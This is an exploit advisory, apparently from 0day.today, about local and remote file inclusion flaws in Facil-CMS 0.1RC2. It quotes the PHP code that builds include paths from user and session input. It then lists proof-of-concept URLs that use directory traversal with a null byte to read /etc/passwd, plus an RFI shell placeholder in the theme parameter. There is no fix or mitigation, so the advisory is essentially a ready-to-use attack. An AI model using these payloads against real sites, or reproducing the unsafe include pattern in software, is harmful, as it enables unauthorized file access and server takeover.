Facil-CMS (LFI/RFI) Vulnerability

🗓️ 04 Apr 2010 00:00:00Reported by eidelweissType

zdt🔗 0day.today👁 14 Views

Facil-CMS (LFI/RFI) Vulnerability in Version 0.1RC2, allowing unauthorized file acces

=================================
Facil-CMS (LFI/RFI) Vulnerability
=================================

########################################################
    Facil-CMS (LFI/RFI) Vulnerability
########################################################
[+]Title    :   Facil-CMS Multiple Vulnerability
[+]Version: 0.1RC2
[+]Download:    http://sourceforge.net/projects/facil-cms/files/
[+]Author:  eidelweiss  
 
    [!]Thank`s To: all friends
 
########################################################
 
    -=[ Vuln C0de ]=-
***********************
[-]facil-cms/index.php
 
 require_once('config.inc.php');
 require_once(_FACIL_INCLUDES_PATH_ . '/facil-settings.php');
  
 $config = new facilConfig();
 $utils = new facilUtils();
  
 if($utils->is_module($config->getSiteIndex()))
 
require_once(_FACIL_MODULES_PATH_ . '/' . $config->getSiteIndex() . '/config.php');
require_once(_FACIL_MODULES_PATH_ . '/' . $config->getSiteIndex() . '/class/index.php');
 
***********************
[-]facil-cms/modules.php
 
require_once('config.inc.php');
 require_once(_FACIL_INCLUDES_PATH_ . '/facil-settings.php');
 
 if($_POST['modload'] && !eregi("/", $_POST['modload']))
 {
    $_MODLOAD = trim($_POST['modload']);
    if($_POST['fileload'] && !eregi("/", $_POST['fileload']))
    {
        $FILELOAD = trim($_POST['fileload']);
 
    $_MODLOAD = false;
    $FILELOAD = false;
 
 if($_POST['admload'] &&  !eregi("/", $_POST['admload']))
 {
    $_ADMLOAD = trim($_POST['admload']);
    if($_POST['fileload'] && !eregi("/", $_POST['fileload']))
 
 
    $_ADMLOAD = false;
    $FILELOAD = false;
 
    require_once(_FACIL_MODULES_PATH_ . '/' . $_MODLOAD . '/config.php');
    require_once(_FACIL_MODULES_PATH_ . '/' . $_MODLOAD . '/class/index.php');
 
*******************
 
[-]facil-cms/includes/facil-settings.php
 
if(!isset($_SESSION['FACIL_LANGUAGE']))
 {
    $_SESSION['FACIL_LANGUAGE'] = $config->getLanguage();
 }
  
 require_once(_FACIL_I18N_PATH_ . '/lang-' . $_SESSION['FACIL_LANGUAGE'] . '.php');
 require_once(_FACIL_THEMES_PATH_ . '/' . $_SESSION['FACIL_THEME'] . '/themeFacil.class.php');
 
*******************
 
    -=[ Proof Of Concept ]=-
 
    http://127.0.0.1/facil-cms/modules.php?modload=../../../../../../../../etc/passwd%00
    Similar reference:
    http://www.exploit-db.com/exploits/5792
 
    http://127.0.0.1/facil-cms/index.php?getSiteIndex=../../../../../../../../etc/passwd%00
 
    http://127.0.0.1/facil-cms//includes/facil-settings.php?FACIL_THEME= [rfi shell]
 
########################################################



#  0day.today [2018-01-17]  #

04 Apr 2010 00:00Current

7.1High risk

Vulners AI Score7.1